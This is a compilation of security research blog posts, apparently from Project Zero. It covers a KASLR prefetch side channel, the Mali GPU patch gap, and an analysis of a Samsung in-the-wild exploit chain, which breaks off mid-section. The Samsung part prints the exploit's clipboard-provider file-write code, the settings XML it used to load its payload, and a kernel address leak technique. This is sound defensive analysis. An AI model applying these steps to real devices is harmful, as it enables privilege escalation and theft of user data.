Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.


There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.


Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:


Breaking KASLR with Prefecth: Grepping through kallsyms took .077 seconds while using the prefetch technique took .013 seconds


This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue - KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.


Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs\nArm Mali: driver exposes physical addresses to unprivileged userspace\n\n
 @jgrusko Replying to @ProjectZeroBugs\nRIP the feature that was there forever and nobody wanted to report :)

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = ‘clipboardimage.db’

        TABLE_NAME = ‘ClipboardImageTable’

        URL = ‘content://com.sec.android.semclipboardprovider/images’

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

URI semclipboard_uri = URI.parse("content://com.sec.android.semclipboardprovider")

ContentResolver resolver = getContentResolver();

URI newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.

The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name=\"eng-USA-Variant Info\">f00</string>\n"

          <string name=\"SMT_STUBCHECK_STATUS\">STUB_SUCCESS</string>\n"

          <string name=\"SMT_LATEST_INSTALLED_ENGINE_PATH\">/data/system/users/0/newFile.bin</string>\n"

      </map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

oid __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP